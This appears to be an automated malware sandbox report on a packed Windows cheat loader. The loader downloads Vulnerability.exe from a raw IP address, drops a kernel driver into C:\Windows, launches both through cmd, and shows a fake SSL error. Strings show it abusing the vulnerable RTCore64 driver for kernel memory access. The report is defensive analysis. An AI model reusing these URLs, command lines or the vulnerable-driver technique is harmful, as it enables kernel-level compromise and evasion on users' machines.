Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: http://crl.globalsign.net/root.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/2(f
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: Iyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/03
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownHTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E945000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NtUserGetRawInputDatamemstr_6d72b45d-7

System Summary

barindex
Source: Iyto7FYCJO.exeStatic PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E6810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree,5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F32C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn,5_2_00007FF7738F32C0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E45E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7738E45E0
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sysJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\Vulnerability.exeJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\driver.sysJump to behavior
Source: C:\Windows\Vulnerability.exeFile created: C:\Windows\symbols\Jump to behavior
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E3CE05_2_00007FF7738E3CE0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E13305_2_00007FF7738E1330
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F16305_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E45E05_2_00007FF7738E45E0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E64405_2_00007FF7738E6440
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738EFBF05_2_00007FF7738EFBF0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E68105_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E50105_2_00007FF7738E5010
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F3B605_2_00007FF7738F3B60
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E72B05_2_00007FF7738E72B0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738E7EA05_2_00007FF7738E7EA0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F32C05_2_00007FF7738F32C0
Source: C:\Windows\Vulnerability.exeCode function: String function: 00007FF7738EA3C0 appears 102 times
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Source: driver[1].sys.0.drBinary string: \Device\{83040329-923403830}
Source: Vulnerability.exe.0.drBinary string: \Device\PhysicalMemory
Source: Vulnerability.exe.0.drBinary string: 0\DosDevices\RTCore64\Device\RTCore64
Source: classification engineClassification label: mal100.expl.evad.winEXE@25/5@1/3
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,5_2_00007FF7738F14C0
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\60023779-100a-4137-a2cb-f060494dee00Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Iyto7FYCJO.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\Iyto7FYCJO.exe "C:\Users\user\Desktop\Iyto7FYCJO.exe"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sysJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Iyto7FYCJO.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Iyto7FYCJO.exeStatic file information: File size 6070784 > 1048576
Source: Iyto7FYCJO.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c9a00
Source: Iyto7FYCJO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
